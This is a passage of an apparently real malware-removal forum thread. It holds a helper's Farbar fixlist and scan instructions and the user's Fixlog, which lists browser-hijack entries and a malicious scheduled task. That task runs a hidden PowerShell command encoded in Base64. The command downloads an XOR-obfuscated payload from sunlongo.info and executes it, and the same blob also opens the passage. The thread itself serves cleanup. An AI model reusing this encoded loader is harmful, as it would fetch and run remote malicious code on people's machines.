BuAGoAZQByAGUAMwB1AGkAZABiAF8AMQA5ADcAYwBUAEwAOQBvAHQAbQBJAEwAbABKAF8AVQBlAHIAUABDAEYATwBSADYATgBwAHgATwBUADgAaABFADcARgByAHUAZQBLAGkARwBrAGEAWQBHAHAATwBYAGUAQQBNADEAaABfAG8AYgBJAFQATgBGADgAbABVAEIANgBpAE0AWgBLAF8AVgBXAG0AMQBkAE8AWgBmAEEAbABBAE4AMABzAEIAVwB2AHAAQgBjADkAbAAxAHIAUgBPAHAAdwA5AFQAbAByAEkAawBzAHUAbwBmAHYAUQBMAGoAUABhAGQAOAB0AHcAVwBDAC0AcABIAHYARgBVAGIARwA2AGQASQB5AEUAZABDAFkAOABvAE4AYwBJAEoAdAAzAEEARQBzAGsAbgA1ADQAaAB6AEIARgBfAHgAMQBUAEkASABSAC0AZQBsAG8AaABLAGIAYwBCAE4AbQBDAEkAaQBIAGoAcgBlAGwAbQA3AEcAZABqAGUANQBhAHcANABpAFMAdABVAHQAQwBmAGUAawA2AHgAbgBDAG0AdABXAF8AMABPAC0AQwB2AF8AXwBmAGkAUwA3AFcAVwBoAEkATwAyAGQASAA0AGIAVAA0ADAAUABMADQAaQB4AFEAagBOAHIANQAzADYAMQA3ADgAeAAxADYASwBuADQATABZAEUAZABxAFUAMwB0AC0ARwBoADAAWgBfAHIAYwAwAGwAXwBoAEcAaQBMAFMAcABSADEAdABwAGcAOQA2ADQAZgBwAEcAQgBhAEoATgBvADQANwBWAEwAOQBqAGwAXwB3AGgAbQBQAHIAUQA4AFMAbAB3AGIARQBGAC0AaQBoAGsAWgBWAHgATABBAE8AOABOAE0AWgA1AEoARQAtAFcAdABrAGgAVABDADkAbwBzAE0AUwBDAEkAbQBPAGwATgBIAG4AdQB3AEoAMwBzAFoAeQAzADQAMAA5AFgASAAwAFMAawAwAHUAZQBaAE8AYQBGAFkAQgA1AEUAMABoADMAagBtAG0AcwAzAEIAMQBfAHQAZAB5AFAAcwBGADkALQBtADcAdwBmAFUAVQBNAEIAOQBOAFcASgBMAG0AbgBIAHYAZABmADgAUABKAEMAdQBuADcAVwBIAC0ASwAyADAARAB2ADIAdwBlAEUAWABVAHMATAA1AEcAegBWAGwASgBmAFUAbgBmAGMASAB3AEwAVwByAEkAdAA3AEcANABjAG0ATgAzAGUASwBPAC0AQwB6AG8AYwBtAGsAcgBlAE4ANABqAG4ATQB0ADQAQgBWAEQAYwAyAGkAbABNAGsAUwB5ADgAZQBTAGgAQQB4AEgAYwB1AGIAXwBaADMAVABYAG0AWgBFADgAaQBzAHgAeQBoADkAMABmAGYASAB6AHAATgB5AHkANAB6AFkAcgAwADIAeQBUADIAQgBWADQAMwB4AFIATgBYAG4ASwBEAEoASwAwAGwASgBZAEcAaAAyAHMAUwB6AEEANABzAHgANABQAGoALQBZADgANABvADUASQBHAHUATgBQAEsAYgBGAHAAMwBmADcAaABIAHMAcwBhADEAbABMAGsAeQBfAF8ARgBlAGYAeABIAGkANQBaADMASgA5AG4AbABfAHgANwB4AHAATAA0AGcAUQBHAGQAawBXAGgANABxADYAdQBzADkAdwBXADEAUQA3AE0AWgBBAC0AbQBNAG8AVwBYAGoAdABEAEsAYgBHAFoAeABjADAAZwB1AHUAbwAzAFEAdABQAEsAegB4AG0AagBlAG0AOQB6ADYAMgBsAGwAZQBZADcANwBUAFgANwA5AFUAYwAwAEMAWQBwAF8ARgAmAGMAPQBvAEoAeABSAEYAUABOAFAALQB6AEkARQBxAHMAQQBPAFcARQBaADAAOABnAE8AZgBuADMAZABhAGsAZQA1AG8AcABZAGgAcwBYAEkAYgBfAEcAQgBSADEASQA4AHEAawB3AEIAcwBZAGQAYwBEAGUARwBUAHAAZwBDAFoAbQBDAHQAawBPADYARQBfAHQAbgA4AHcASgBoAEgAMAAwAFQAVgB3AEwATgBCADUAegBxAE0AVQBYADEAUwB0AGIAWABCAGQAbQBaADMAQgBtAGwASwBKAFAAdwBkAGIANgA5AHYAdgBoAC0AdwA1AFEAbQBjAFQAdABFAGUARAA3AHAAVABVAGUASQA0AGsAMQA0AGkAcwBYAGEANwBEAEIAOAA5AEUAUwB5AEIANQBUAHIARgA5AFoAOABRAG8AbQBtADYASABCAHMAawBlAGEAQwBoADIAMQBRAEsAQgBBADIAVwA0AGQAZgB2ADkAaQBYADYAZAB0ADIAVgBRADEAWgBOADEAUgBOAGYAaQB6AE4AagBYAFMAaABUAFgAUwB6ADAAWQBpAE4ANwBFAFkAcwAxAEYARAAwAEoALQBuAFUAdQA1AHYAQgBYAHEANQBzAHIARABEADUALQAwAFcAWABXAHEAVAAtAEwAMgB2AGIAVQBEAGMATgBMAFMAOAA1AEEAcAB4AEwAbABlADEARQBYAHEATQBmAEYAUgBIAC0AawBMAHcAWQBXAGsAZQB0AFUARQA5AGsAQQBMAEoAcQBNAEIAOQBEAEkATQB0AHYAWQB5AGcAWQBPAFkAcwByAGUAMQBCAHcATwB1AHcAcgBTAGcAbgBrADIAbQBaAF8AZgAtAFQAeQBJAFYASgBFAGsAXwBzAF8ATAA1AGUAMABRAF8AMwBjAGcAQQBEAGkATwBKAEgAUQBLAFQATwBPAHgATAB4AGEAegBFAHMATgBpAFQAQgBxAFoASgB3AHMAcQBQAGgAdwA1AFUAQQB2AGcAXwB1ADIAOABaAG0AawBFAEkATwBwAEEAdQBSAHIAVgB3ADcAMQB3ADgASABiAHIAVwBlADkAMgByADMAeABnAEIASAAzAHUAVgAzAFUASQBvAG4AagBZAGsAYQA0AHEAQwB0AFcALQB2AFQAeABrAHIAXwBuAHIAaQBNAGcATABHAGMAZwBKAGsANQB2AGQALQAtAGsASwBtAHYAaAA0AF8AcABFAGcATQAtAGgAOABnADIAYgBQADUANAAwAHgATQBMAHMAdQA2AGUAVQBGADYAYQAyAEEAVQBQAGcAQgBmAGYAaABHAGoAMwB1AEQARABSAHEAMwBvAFQAbQBBAFcAYQBGAFgAagBwADMASgBqAFkALQA0ADIAUwBLAEkAMQBIAHUAVwBBAHcAZgB5AEYAdABJAG0AeABtADMARQBqAFQASgA0AFIAeABLAHIATQBRADUAegB6AGoAaQB4AC0ANgAtAFcANgBoAEUAVQBxAFMAMgA3ADgAZQBvAEQATABxAEQAWgBNAEYAUQBjAGgAYQBPAHkAdgBlAEcAcwBBADMAVwBVAEoAYgBaAGIARwBqAHIAdAB4AEwAZABhAFkAYQA1AF8AZgBrAEwAUQA5AHMASgA5AGkANABPAFIAMwA2AHEAVABFAEoAbQBvAFMAbABVADEAYQBHAEsATwBkAGEAVABUAEEAQQBMAFkAeQA0AEMASgA4AFEASgB1AE4AVQBOAFIASgBEAE0AcABQAHQAOABVADIAeQBMAEcARgB6AGQAXwBOAHMASQBqADEAbABNAEsAagBzAG0AagBKAG0AUAA1AEYAUQBWAFgATQBnAEsAUgAtAHUARABLAE4AZwAyAE0AbQBJAGIAeAA1AFUAZQBSAGQAMQA0AHYAdABOAEYANgByAFUAdABlAEwAUgBKAEkAeAA0AGcASABSAHMANQAtAEcAZgBxAFMAMwBUAFoAUQBBAEcAZgB5AEYAOAAzADQASgA1AGkAdwA0AG0AYgB4AEgASABmADgAMQB6ADYAUgBOAHkAWQBsAE8AbwBLAFcAdgBlAFcALQBfAF8ASwB5AGUATgBzADYAVwBKAFUARwBMAFUARQBXADQAbgBnAGQAeABXAFgAZwA4ADMAdgBHAHoAVQB1AEkALQBOADgAbgB5AFcANQA2AFYAOAB0AEcAawBkADUASwBZAFkAZQBZAEEAaABIAGUAUgAzAEwAbQAtAHEAYQBpADgAdwBMAGgAeABlAHAAVABiAEcAawBBADUAagB3ADcAOQBuAEkANAByAG4AcgA2AHkAVABrAHEAZAA4AFUAVQBsAGwANQBKAHIAeQBUAHMATQA1AFIAUABtAHMAeABXAF8ANQBVAHQAaQBHAG4ATwB5AFkAVgBHAHoAeQB2AEkAMwB1AEIARwBQAGIASQAxAGQAQQBiAHgAbgBnAHoAQwBRAFgAMgBoAGwAagBlAHEAbwB6AEkAUQBRADcAZgAyAHUAXwBQAGkAdABEADQAaQA5AEMAegBiAE8AJgByAD0AMwAzADEAMQA3ADAANQAyADMAOAA3ADAAOQA2ADUANwA3ADcAMgAiADsAJABzAHQAcwBrAD0AIgB7ADcARQAwAEIAMABFADQANwAtADAARgA3ADkALQAwADgAMAA4AC0AMABCADEAMQAtADAAQwAwAEMAMABBADcARgAxADEAMABDAH0AIgA7ACQAcAByAGkAZAA9ACIATwBuAGUAUwB5AHMAdABlAG0AQwBhAHIAZQAiADsAJABpAG4AaQBkAD0AIgBTAEoATABLAEwATQBNAEoAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
    CMD: ipconfig /flushdns
    EmptyTemp:
    end
  • Click FileSave As and type fixlist.txt as the File Name
  • Important: The file must be saved in the same location as FRST64.exe. 

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.
     

STEP 2
GfiJrQ9.png Malwarebytes Anti-Malware (MBAM)

  • Open Malwarebytes Anti-Malware and click Update Now.
  • Once updated, click the Settings tab, followed by Detection and Protection and tick Scan for rootkits.
  • Click the Scan tab, ensure Threat Scan is selected and click Start Scan.
  • Note: You may see the following message, "Could not load DDA driver". Click Yes, allow your PC to reboot and continue afterwards. 
  • If threats are detected, click Remove Selected. If you are prompted to reboot, click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • Click Copy to Clipboard and paste the log in your next reply. 
     

STEP 3
GzlsbnV.png ESET Online Scan
Note: This scan may take a long time to complete. Please do not browse the Internet whilst your Anti-Virus is disabled.

  • Please download ESET Online Scan and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Double-click esetsmartinstaller_enu.exe to run the programme. 
  • Agree to the EULA by placing a checkmark next to Yes, I accept the Terms of Use. Then click Start.
  • Agree to the Terms of Use once more and click Start. Allow components to download.
  • Place a checkmark next to Enable detection of potentially unwanted applications.
  • Click Advanced settings. Place a checkmark next to:
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Ensure Remove found threats is unchecked.
  • Click Start.
  • Wait for the scan to finish. Please be patient as this can take some time.
  • Upon completion, click esetListThreats.png. If no threats were found, skip the next two bullet points. 
  • Click esetExport.png and save the file to your Desktop, naming it something such as "MyEsetScan".
  • Push the Back button.
  • Place a checkmark next to KN1w2nv.png and click SzOC1p0.png.
  • Re-enable your anti-virus software.
  • Copy the contents of the log and paste in your next reply.
     

======================================================
 
STEP 4
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • AdwCleaner[C1].txt
  • Fixlog.txt
  • MBAM Scan log
  • ESET Online Scan log

  • 0

#7
JonKaz

JonKaz

    New Member

  • Topic Starter
  • Member
  • Pip
  • 6 posts

Hello.

 

AdwCleaner[C1].txt was copied but not saved. Computer rebooted after FRST run and AdwCleaner now says "nothing found" so no .txt file was created.

 

Fixlog.txt

 

Fix result of Farbar Recovery Scan Tool (x64) Version:17-02-2016

Ran by Jonathan (2016-02-24 17:12:53) Run:1
Running from C:\Users\Jonathan\Downloads
Loaded Profiles: Jonathan (Available Profiles: Jonathan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"
CHR StartupUrls: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"    
CHR DefaultSearchURL: Default -> hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV1ZU19BFFEabVheA1hcFQxFIhQAUlhFDAJHdAhaAg4VFAYUIh9aFQQTQkcFME0FBloEURNNfWpdAEsSSX5NL04=&q={searchTerms}
CHR DefaultSearchKeyword: Default -> searchinterneat-a.akamaihd.net
CHR DefaultNewTabURL: Default -> hxxp://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHFFCcl8IVF1IDFRFIlgVVQAXQxgbc1gMTA4VFQRBIw5cVApGQxNBNARaAktXUUEeJ1pNER8fHGZGIUtbCXIfTkI=
OPR StartupUrls: "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"
2016-02-19 08:25 - 2016-02-19 21:57 - 00000000 ____D C:\ProgramData\54070cb8-2431-0
2016-02-19 08:20 - 2016-02-19 21:57 - 00000000 ____D C:\ProgramData\54070cb8-6861-0
2016-02-19 08:20 - 2016-02-19 08:20 - 00000000 ____D C:\ProgramData\{2b04c619-412c-1}
2016-02-19 08:20 - 2016-02-19 08:20 - 00000000 ____D C:\ProgramData\{08be3c40-312c-0}
2016-02-19 08:20 - 2016-01-15 10:14 - 00000000 ____D C:\ProgramData\b3eda95e-7691-0
2016-02-19 08:20 - 2016-01-15 10:14 - 00000000 ____D C:\ProgramData\b3eda95e-5667-1
Task: {5BB340FA-98D2-4DA0-94D1-6CD0DEC5E954} - System32\Tasks\{7E0B0E47-0F79-0808-0B11-0C0C0A7F110C} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAdQBuAGwAbwBuAGcAbwAuAGkAbgBmAG8ALwB1AC8APwBhAD0AZQBzAHoASABHAHEAUwBjAEUAeQBxAG0AeAB4AGQANQBvAFMAUABkADQAdABSAFYAQwAxAHAATABaAGQAQwBIAF8AZABqAGoAbgBKADUAagA4AHQATgBZAEkAaQBrAEcAeABaAEEAagBtAHIAbABPAEYAWQBpAFAAYwBaAEYAbgBQADAAXwA0ADcAWgA1AEsATgBNADcAcQBiAHcASQB0AHkATQA1AG4AZgB1AHIANgBFAFQAcwBzAHoANwBEAHMAcgBGAHUARABiAFUAYQBQAHgAMQBRAG0ASgBYAEcATwBNAHoATQBFAGIAMQBiAFEAbQBZADgAaAB6AEMAOQB0ADUASwBfAE8AYQBPAEQAZABjAEsAXwBMAEIAYQBSAGIAdgAyAG8AQQBGADQAdQA1AHcAdgB5AHgAZwA0ADAARwB1AEsAdgAtAHEAOQA1AEoALQBlAGcAYQBOAGUAeABVAGUAWgBWAHEANQBhAFgAZQBuAGoAZQByAGUAMwB1AGkAZABiAF8AMQA5ADcAYwBUAEwAOQBvAHQAbQBJAEwAbABKAF8AVQBlAHIAUABDAEYATwBSADYATgBwAHgATwBUADgAaABFADcARgByAHUAZQBLAGkARwBrAGEAWQBHAHAATwBYAGUAQQBNADEAaABfAG8AYgBJAFQATgBGADgAbABVAEIANgBpAE0AWgBLAF8AVgBXAG0AMQBkAE8AWgBmAEEAbABBAE4AMABzAEIAVwB2AHAAQgBjADkAbAAxAHIAUgBPAHAAdwA5AFQAbAByAEkAawBzAHUAbwBmAHYAUQBMAGoAUABhAGQAOAB0AHcAVwBDAC0AcABIAHYARgBVAGIARwA2AGQASQB5AEUAZABDAFkAOABvAE4AYwBJAEoAdAAzAEEARQBzAGsAbgA1ADQAaAB6AEIARgBfAHgAMQBUAEkASABSAC0AZQBsAG8AaABLAGIAYwBCAE4AbQBDAEkAaQBIAGoAcgBlAGwAbQA3AEcAZABqAGUANQBhAHcANABpAFMAdABVAHQAQwBmAGUAawA2AHgAbgBDAG0AdABXAF8AMABPAC0AQwB2AF8AXwBmAGkAUwA3AFcAVwBoAEkATwAyAGQASAA0AGIAVAA0ADAAUABMADQAaQB4AFEAagBOAHIANQAzADYAMQA3ADgAeAAxADYASwBuADQATABZAEUAZABxAFUAMwB0AC0ARwBoADAAWgBfAHIAYwAwAGwAXwBoAEcAaQBMAFMAcABSADEAdABwAGcAOQA2ADQAZgBwAEcAQgBhAEoATgBvADQANwBWAEwAOQBqAGwAXwB3AGgAbQBQAHIAUQA4AFMAbAB3AGIARQBGAC0AaQBoAGsAWgBWAHgATABBAE8AOABOAE0AWgA1AEoARQAtAFcAdABrAGgAVABDADkAbwBzAE0AUwBDAEkAbQBPAGwATgBIAG4AdQB3AEoAMwBzAFoAeQAzADQAMAA5AFgASAAwAFMAawAwAHUAZQBaAE8AYQBGAFkAQgA1AEUAMABoADMAagBtAG0AcwAzAEIAMQBfAHQAZAB5AFAAcwBGADkALQBtADcAdwBmAFUAVQBNAEIAOQBOAFcASgBMAG0AbgBIAHYAZABmADgAUABKAEMAdQBuADcAVwBIAC0ASwAyADAARAB2ADIAdwBlAEUAWABVAHMATAA1AEcAegBWAGwASgBmAFUAbgBmAGMASAB3AEwAVwByAEkAdAA3AEcANABjAG0ATgAzAGUASwBPAC0AQwB6AG8AYwBtAGsAcgBlAE4ANABqAG4ATQB0ADQAQgBWAEQAYwAyAGkAbABNAGsAUwB5ADgAZQBTAGgAQQB4AEgAYwB1AGIAXwBaADMAVABYAG0AWgBFADgAaQBzAHgAeQBoADkAMABmAGYASAB6AHAATgB5AHkANAB6AFkAcgAwADIAeQBUADIAQgBWADQAMwB4AFIATgBYAG4ASwBEAEoASwAwAGwASgBZAEcAaAAyAHMAUwB6AEEANABzAHgANABQAGoALQBZADgANABvADUASQBHAHUATgBQAEsAYgBGAHAAMwBmADcAaABIAHMAcwBhADEAbABMAGsAeQBfAF8ARgBlAGYAeABIAGkANQBaADMASgA5AG4AbABfAHgANwB4AHAATAA0AGcAUQBHAGQAawBXAGgANABxADYAdQBzADkAdwBXADEAUQA3AE0AWgBBAC0AbQBNAG8AVwBYAGoAdABEAEsAYgBHAFoAeABjADAAZwB1AHUAbwAzAFEAdABQAEsAegB4AG0AagBlAG0AOQB6ADYAMgBsAGwAZQBZADcANwBUAFgANwA5AFUAYwAwAEMAWQBwAF8ARgAmAGMAPQBvAEoAeABSAEYAUABOAFAALQB6AEkARQBxAHMAQQBPAFcARQBaADAAOABnAE8AZgBuADMAZABhAGsAZQA1AG8AcABZAGgAcwBYAEkAYgBfAEcAQgBSADEASQA4AHEAawB3AEIAcwBZAGQAYwBEAGUARwBUAHAAZwBDAFoAbQBDAHQAawBPADYARQBfAHQAbgA4AHcASgBoAEgAMAAwAFQAVgB3AEwATgBCADUAegBxAE0AVQBYADEAUwB0AGIAWABCAGQAbQBaADMAQgBtAGwASwBKAFAAdwBkAGIANgA5AHYAdgBoAC0AdwA1AFEAbQBjAFQAdABFAGUARAA3AHAAVABVAGUASQA0AGsAMQA0AGkAcwBYAGEANwBEAEIAOAA5AEUAUwB5AEIANQBUAHIARgA5AFoAOABRAG8AbQBtADYASABCAHMAawBlAGEAQwBoADIAMQBRAEsAQgBBADIAVwA0AGQAZgB2ADkAaQBYADYAZAB0ADIAVgBRADEAWgBOADEAUgBOAGYAaQB6AE4AagBYAFMAaABUAFgAUwB6ADAAWQBpAE4ANwBFAFkAcwAxAEYARAAwAEoALQBuAFUAdQA1AHYAQgBYAHEANQBzAHIARABEADUALQAwAFcAWABXAHEAVAAtAEwAMgB2AGIAVQBEAGMATgBMAFMAOAA1AEEAcAB4AEwAbABlADEARQBYAHEATQBmAEYAUgBIAC0AawBMAHcAWQBXAGsAZQB0AFUARQA5AGsAQQBMAEoAcQBNAEIAOQBEAEkATQB0AHYAWQB5AGcAWQBPAFkAcwByAGUAMQBCAHcATwB1AHcAcgBTAGcAbgBrADIAbQBaAF8AZgAtAFQAeQBJAFYASgBFAGsAXwBzAF8ATAA1AGUAMABRAF8AMwBjAGcAQQBEAGkATwBKAEgAUQBLAFQATwBPAHgATAB4AGEAegBFAHMATgBpAFQAQgBxAFoASgB3AHMAcQBQAGgAdwA1AFUAQQB2AGcAXwB1ADIAOABaAG0AawBFAEkATwBwAEEAdQBSAHIAVgB3ADcAMQB3ADgASABiAHIAVwBlADkAMgByADMAeABnAEIASAAzAHUAVgAzAFUASQBvAG4AagBZAGsAYQA0AHEAQwB0AFcALQB2AFQAeABrAHIAXwBuAHIAaQBNAGcATABHAGMAZwBKAGsANQB2AGQALQAtAGsASwBtAHYAaAA0AF8AcABFAGcATQAtAGgAOABnADIAYgBQADUANAAwAHgATQBMAHMAdQA2AGUAVQBGADYAYQAyAEEAVQBQAGcAQgBmAGYAaABHAGoAMwB1AEQARABSAHEAMwBvAFQAbQBBAFcAYQBGAFgAagBwADMASgBqAFkALQA0ADIAUwBLAEkAMQBIAHUAVwBBAHcAZgB5AEYAdABJAG0AeABtADMARQBqAFQASgA0AFIAeABLAHIATQBRADUAegB6AGoAaQB4AC0ANgAtAFcANgBoAEUAVQBxAFMAMgA3ADgAZQBvAEQATABxAEQAWgBNAEYAUQBjAGgAYQBPAHkAdgBlAEcAcwBBADMAVwBVAEoAYgBaAGIARwBqAHIAdAB4AEwAZABhAFkAYQA1AF8AZgBrAEwAUQA5AHMASgA5AGkANABPAFIAMwA2AHEAVABFAEoAbQBvAFMAbABVADEAYQBHAEsATwBkAGEAVABUAEEAQQBMAFkAeQA0AEMASgA4AFEASgB1AE4AVQBOAFIASgBEAE0AcABQAHQAOABVADIAeQB